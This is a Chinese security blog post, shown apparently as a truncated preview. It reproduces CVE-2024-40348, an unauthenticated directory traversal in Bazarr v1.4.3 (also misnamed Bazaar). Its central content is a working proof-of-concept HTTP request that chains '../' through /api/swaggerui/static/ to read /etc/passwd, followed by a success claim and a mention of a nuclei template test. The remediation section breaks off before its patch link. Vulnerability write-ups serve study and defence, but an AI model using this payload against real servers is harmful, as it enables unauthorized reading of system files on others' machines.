【成功复现】Bazaar swaggerui任意文件读取漏洞(CVE-2024-40348)

文章预览

网安引领时代，弥天点亮未来       0x00写在前面       本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！ 0x01漏洞介绍 Bazarr是Bazarr公司的一款软件，是 Sonarr 和 Radarr 的配套应用程序，可根据您的要求管理和下载字幕。 Bazarr v1.4.3版本存在安全漏洞，该漏洞源于允许未经身份验证的攻击者执行目录遍历。 0x02影响版本 影响产品及版本：Bazaar v1.4.3 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC  漏洞复现 GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: 127.0.0.1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 成功读取 /etc/passwd 。 3. Yakit工具加载nuclei文件测试（漏洞存在） 0x04修复建议 目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ………………………………